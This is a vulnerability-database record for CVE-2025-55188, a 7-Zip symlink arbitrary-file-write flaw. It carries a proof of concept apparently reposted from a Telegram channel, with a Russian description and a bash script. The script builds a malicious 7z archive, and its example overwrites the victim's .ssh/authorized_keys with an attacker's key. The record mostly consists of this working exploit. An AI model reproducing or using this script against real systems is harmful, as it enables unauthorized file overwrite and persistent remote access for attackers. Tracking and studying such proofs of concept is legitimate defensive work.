{"uuid": "77a33266-1592-4c71-a326-ee3673b3d988", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-55188", "type": "published-proof-of-concept", "source": "https://t.me/zero_day_uz/499", "content": "CVE-2025-55188\n7z-exploit\nSymlink Arbitrary File\n7-Zip \u0434\u043e 25.01.\n \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e 7-Zip \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0441\u0438\u043c \u043b\u0438\u043d\u043a\u0438 \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u043c\u0443 \u0430\u0440\u0445\u0438\u0432\u0443 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c  \u0444\u0430\u0439\u043b\u044b \u0432  \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n#!/bin/bash\nif [ \"$#\" -ne 3 ]; then\n    echo \"Usage: $0   \"\n    echo \"Example: $0 mykey.pub ../../.ssh/authorized_keys exploit.7z\"\n    exit 1\nfi\n\nPAYLOAD=\"$1\"\nTARGET=\"$2\"\nOUT=\"$3\"\n\nWORKDIR=$(mktemp -d)\nln -s \"$TARGET\" \"$WORKDIR/symlink\"\ncp \"$PAYLOAD\" \"$WORKDIR/symlink\"\n\ntar --sort=name -cf \"$WORKDIR/exploit.tar\" -C \"$WORKDIR\" symlink\n7z a \"$OUT\" \"$WORKDIR/exploit.tar\" >/dev/null\n\necho \"[*] Exploit archive created: $OUT\"\nrm -rf \"$WORKDIR\"", "creation_timestamp": "2025-08-11T15:49:17.000000Z"}